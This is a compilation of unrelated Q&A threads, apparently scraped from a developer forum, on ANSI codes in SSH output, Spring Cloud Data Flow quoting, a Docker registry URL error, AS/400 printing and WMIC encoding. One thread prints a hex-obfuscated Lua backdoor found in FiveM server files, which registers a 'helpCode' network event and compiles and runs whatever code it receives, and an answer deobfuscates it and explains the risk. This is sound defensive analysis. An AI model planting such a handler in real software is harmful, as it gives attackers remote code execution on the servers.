I'm building an iOS application that communicates with a remote server. In this case, I'm executing commands using SSH, however, the response coming back from the server is coming in the form of what appears to be hexadecimal. My delegate function for handling responses from a remote server takes the response argument as an NSString, however, this is the content of the string returned (command executed was "ls /" )
ls /\r\n\x1b[0m\x1b[01;34mbin\x1b[0m \x1b[01;34mdev\x1b[0m \x1b[01;36minitrd.img\x1b[0m \x1b[01;34mlib64\x1b[0m \x1b[01;34mmnt\x1b[0m \x1b[01;34mroot\x1b[0m \x1b[01;34msrv\x1b[0m \x1b[01;34musr\x1b[0m\r\n\x1b[01;34mboot\x1b[0m \x1b[01;34metc\x1b[0m \x1b[01;36minitrd.img.old\x1b[0m \x1b[01;34mlost+found\x1b[0m \x1b[01;34mopt\x1b[0m \x1b[01;34mrun\x1b[0m \x1b[01;34msys\x1b[0m \x1b[01;34mvar\x1b[0m\r\n\x1b[01;34mcdrom\x1b[0m \x1b[01;34mhome\x1b[0m \x1b[01;34mlib\x1b[0m \x1b[01;34mmedia\x1b[0m \x1b[01;34mproc\x1b[0m \x1b[01;34msbin\x1b[0m \x1b[30;42mtmp\x1b[0m \x1b[01;36mvmlinuz\x1b[0m'
If this is in fact hexadecimal, how to I convert this back to a readable string for display purposes? If it's not hexadecimal, does anyone know what it is?
EDIT:
Since this is ANSI Color Control Codes, what's the best method to remove them?
prepend "\" to the beginning of the command
$ \ls
or provide handling for the escape sequences (strip, display)
Related
So while looking at some server files (FiveM/GTA RP Server Files) my friend sent me, I found a line of code that was placed all over the Server's Resources, is it malicious?, since i checked "Hex to ASCII Text String Converter", it looks like it might be an attempt to inject some code into the Lua environment. The code creates a table with several strings that are encoded in hexadecimal format. These strings are then used to access elements in the global environment (_G) and call them as functions. The code also sets up an event listener for the "load" event, which could indicate that the code is intended to run when a specific event occurs in the environment.
Code:
local ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G}
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[1]
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[3]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[2],
function(BFWCBOOqrwrVwzdmKcQZBRMziBAgjQbWLfBPFXhZUzCWlOjKNLUGOYvDisfytJZwIDtHyn)
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[4]()
end)local
ASCII Text to Hex Code Converter
Image
ASCII Text to Hex Code Converter
Response 2
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG is just a variable name. It's not a very nice one, but it is just a variable name.
{"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64"}
is the table:
{"RegisterNetEvent", "helpCode", "AddEventHandler", "assert", "load"}
with the bytes encoded as hex bytes rather than literal characters.
This deobfuscates to:
local funcs = {
"RegisterNetEvent",
"helpCode",
"AddEventHandler",
"assert",
"load",
_G
};
funcs[6][funcs[1]](funcs[2]);
funcs[6][funcs[3]](funcs[2], function(param)
(funcs[6][funcs[4]](funcs[6][funcs[5]](param)))();
end);
Tables in Lua are 1-indexed, so this further deobfuscates to
_G["RegisterNetEvent"]("helpCode");
_G["AddEventHandler"]("helpCode", function(param)
(_G["assert"](_G["load"](param)))();
end);
And could be simplified to
RegisterNetEvent("helpCode")
AddEventHandler("helpCode", function(param)
assert(load(param))()
end)
While it doesn't look blatantly malicious, it does appear to directly compile and invoke raw code received via the "helpCode" network event, which is certainly dangerous if it's used maliciously. It's possible that this is part of some funny dynamic plugin system, but it's equally possible that it's a backdoor designed to give a network attacker command-and-control over the process.
load is not an event, but the global function used to compile code from a string. The essentially causes the script to listen for a helpCode network event, receive whatever payload from the network event, compile it as Lua code, and execute it. Given that it doesn't even attempt to do any sandboxing of the load'd code, I wouldn't run this without a very comprehensive understanding of how it's being used.
When I configure my stream to be depoyed, in which I'm using a processor (transform, script or http-request), in the "expression" atribute I need to set an expression that contains quotes and double quotes (escaped). The expression works properly the first time I set and allows to deploy the stream, but if I undeploy the stream and try again to deploy it, the spring cloud data flow throws state machine exception because the backslashes used to escape the double quotes are removed.
I already follow the considerations in the Spaces and Quotes documentation, but I think that it only applies to the streams definition and not to the deployment time.
The URL of the spaces and quotes documentarion is: https://docs.spring.io/spring-cloud-dataflow/docs/current-SNAPSHOT/reference/htmlsingle/#shell-white-space
And the sample of the type of expression required:
expression="new String('{\"size\": 1,\"sort\": {\"timestamp\": \"desc\"},\"query\": {\"prefix\": {\"integrationname\": \"63320e0d313862934667225f\"}}}')"
The stream could be as simple as:
http | transform | log
The firs time the expression is set looks like as follows:
expression="new String('{\"size\": 1,\"sort\": {\"timestamp\": \"desc\"},\"query\": {\"prefix\": {\"integrationname\": \"63320e0d313862934667225f\"}}}')"
Deploying correctly the stream.
Once the stream is undeployed and try to deploy it again, the espression looks like:
expression="new String('{"size": 1,"sort\": {"timestamp": "desc"},"query": {"prefix": {"integrationname": "63320e0d313862934667225f"}}}')"
Where the backslashes were removed, causing the state machine exception because of the unescaped double quotes.
Thanks in advance
We are looking at Issue #5145 and will update the issue when we have fixed it.
In the meantime I would suggest using the spring-cloud-dataflow-shell or the REST API to automate deployments where you provide the properties every time as needed.
I set up a registry at docker-registry.elektron.space and when I want to push an image with $ docker push docker-registry.elektron.space/boxbeat-media-server, the upload animation is running in loop for each entity passing from "Pushing" state to "Retrying in X seconds".
After a while I get this error:
failed to parse Location header "https://docker-registry.elektron.space/v2/boxbeat-media-server/blobs/uploads/56244149-c196-439a-85bf-af1121e0b84b%?_state=h1lqY-NljkLbgzTCjd8jxcfdscojPHApblWu-45ISK57Ik5hbWUiOiJib3hiZWF0LW1lZGlhLXNlcnZlciIsIlVVSUQiOiI1NjI0NDE0OS1jMTk2LTQzOWEtODViZi1hZjExMjFlMGI4NGIiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjAtMDMtMDFUMTU6MzI6NTAuMzcxNjc5NTc5WiJ9": parse https://docker-registry.elektron.space/v2/boxbeat-media-server/blobs/uploads/56244149-c196-439a-85bf-af1121e0b84b%?_state=h1lqY-NljkLbgzTCjd8jxcfdscojPHApblWu-45ISK57Ik5hbWUiOiJib3hiZWF0LW1lZGlhLXNlcnZlciIsIlVVSUQiOiI1NjI0NDE0OS1jMTk2LTQzOWEtODViZi1hZjExMjFlMGI4NGIiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjAtMDMtMDFUMTU6MzI6NTAuMzcxNjc5NTc5WiJ9: invalid URL escape "%"
In a readable way:
failed to parse Location header
"https://docker-registry.elektron.space/v2/boxbeat-media-server/blobs/uploads/
56244149-c196-439a-85bf-af1121e0b84b%?_state=
h1lqY-NljkLbgzTCjd8jxcfdscojPHApblWu-45ISK57Ik5hbWUiOiJib3hiZWF0LW1lZGlhLXNlcnZlciIsIlVVSUQiOiI1NjI0NDE0OS1jMTk2LTQzOWEtODViZi1hZjExMjFlMGI4NGIiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjAtMDMtMDFUMTU6MzI6NTAuMzcxNjc5NTc5WiJ9":
parse https://docker-registry.elektron.space/v2/boxbeat-media-server/blobs/uploads/
56244149-c196-439a-85bf-af1121e0b84b%?_state=
h1lqY-NljkLbgzTCjd8jxcfdscojPHApblWu-45ISK57Ik5hbWUiOiJib3hiZWF0LW1lZGlhLXNlcnZlciIsIlVVSUQiOiI1NjI0NDE0OS1jMTk2LTQzOWEtODViZi1hZjExMjFlMGI4NGIiLCJPZmZzZXQiOjAsIlN0YXJ0ZWRBdCI6IjIwMjAtMDMtMDFUMTU6MzI6NTAuMzcxNjc5NTc5WiJ9:
invalid URL escape "%"
Where does this "%" come from? I thought this could come from zsh then I tried to run it with bash but same result.
Any idea?
The issue is that a % sign is used to initiate an escape sequence in url encoding. You need to escape the % itself.
So in your case you should replace the % with %25 which is the escaped form if it. That way you don't get the error because the parser doesn't think an escape sequence is about to start when it sees the %
... /uploads/56244149-c196-439a-85bf-af1121e0b84b%25 ...
This article can also help to understand things better. Even though its about javascript, the information is applicable much broader.
You can lookup escape sequences on this page.
I am attempting to send a file from IFS to an outq on our AS/400 system. Whenever I do, I get exactly what I send, as well as a line of "#" symbols of varying lengths appended to the end.
Here's the command I'm using:
qsh cmd('cat -c /path/test.txt | Rfile -wbQ -c "ovrprtf file(qprint)
outq(*LIBL/ABCD) devtype(*USERASCII) rplunprt(*no) splfname(test) hold(*no)"
qprint')
The contents of test.txt is just Hello World!
The output I get when I send the command is
Hello World!####################################################################
I have not found any posts online about a similar problem, and have tried changing values and looking for additional switches to get it to work. Nothing I'm doing seems to fix the issue.
Is there a command or switch that I am missing, or is something I have in there already causing this?
EDIT:
I found this documentation which is the first time I've seen this issue mentioned, but it's not very helpful:
“Messages for a Take Action command might consist of a long string of "at" symbols (#) in a pop-up message. (The Reflex automation Take Action command, which is configured in situations, does not have this problem.) A resolution for this problem is under construction. This problem might be resolved by the time of the product release. If you see this problem, contact IBM Software Support.”
The only differences are: 1) this is not a pop-up message, it's printed. 2) I don't believe we use Tivoli Monitoring, although I could be wrong.
Assuming we do use Tivoli Monitoring, what would the solution be? There's no additional documentation past that, and I am not a system administrator, so I can't really make the call to IBM Software Support myself. And assuming we DON'T use it, what else could cause this issue?
I get different results, yet similar. I created a test.txt with Windows Explorer, put in Hello, world!, saved it and tried the script. I got gibberish for the 'Hello, world!' and then the line of # symbols.
My system is 7.3 TR5, CCSID 37 (US English) and my IFS file is CCSID 1252 (Windows English). Results did not change if I used a stream file of CCSID 819 (US ASCII).
I didn't have any luck modifying Rfile switches.
I found that removing devtype(*userascii) produced printed output in plain English without the # symbols. Do you really need *USERASCII? I would think that would be more for a pre-formatted 'print-ready' file like Postscript or the like.
EDIT: some more things to try
I don't understand why *USERASCII is adding those # symbols; it looks like a translation issue.
I tried this and still got the extra ###... You might have to play with the TOCCSID() parameter. Although a failure, it did give me an idea: what if those # symbols are EBCDIC spaces being sent as-is to the *USERASCII print stream? All we'd need is a way to send only the number of bytes in the stream file, without any padding.
CRTPF FILE(QTEMP/PRTSTMF) RCDLEN(132)
CPY OBJ('/path/test.txt') TOOBJ('/qsys.lib/qtemp.lib/prtstmf.file/prtstmf.mbr') replace(*yes)
ovrprtf file(qprint) outq(*LIBL/prt3812) devtype(*USERASCII) rplunprt(*no) splfname(test) hold(*no)
cpyf prtstmf qprint
The data in QTEMP/PRTSTMF is in ASCII; DSPPFM shows that much. It also shows a bunch of spaces: after all, it is a fixed length file. My next step was to write an RPG program to read the stream file and print it, but Scott Klement already did that: http://www.scottklement.com/PrtStmf.zip
This works on my system:
ovrprtf file(qsysprt) outq(*LIBL/abcd) devtype(*USERASCII) rplunprt(*no) splfname(test) hold(*no)
prtstmf stmf('/path/test.txt') outq(abcd)
I'm trying to get informations from a windows machine using WMIC in Linux.
Basically, my commands looks like below:
wmic '--authentication-file=/tmp/auth_file' '//127.0.0.1' 'SELECT Name FROM Win32_ComputerSystem'
The connection works fine and the results are correctly printed in the console. The problem is when the info has some type of encoding (like UserNames, for example). In these cases, I always get strange results.
With a quick search, I found some similar issues here and the problem is the encoding of wmic output (that is UNICODE).
As suggested, I tried pipe the output to more, but it causes no effect.
My question is: Are there anyway to force the wmic output to ASCII or ISO-8859-1 when using it through Linux? Apparently, this is the only way to get the right character-enconding.
UPDATE
Just to add more infos.
The wmic command refers to a linux client that uses WMI in a remote connection.
Since this command will be called through scripts (shell, php and python), I tried to make a encoding conversion inside a simple PHP code, but apparently, it does not work, 'cause the detected encode for the output is ISO-8859-1, and conversions for ASCII or UTF-8 simple doesn't work. below is a minimalist version of PHP script
//$cdm is a command like the example above
exec("$cmd", $out);
//also tried to parse $out and used just the string with the encoding problems in the functions below
var_dump(mb_detect_encoding($out, "CP850, UTF-8, ISO-8859-1, ASCII")); // it returns "ISO-8859-1"
var_dump(mb_convert_encoding($out, "ASCII", 'ISO-8859-1'));
var_dump(mb_convert_encoding($out, "UTF-8", 'ISO-8859-1'));
var_dump(mb_convert_encoding($out, "ISO-8859-1", 'UTF-8'));
Info:
Linux: Debian 8
Windows: Windows 10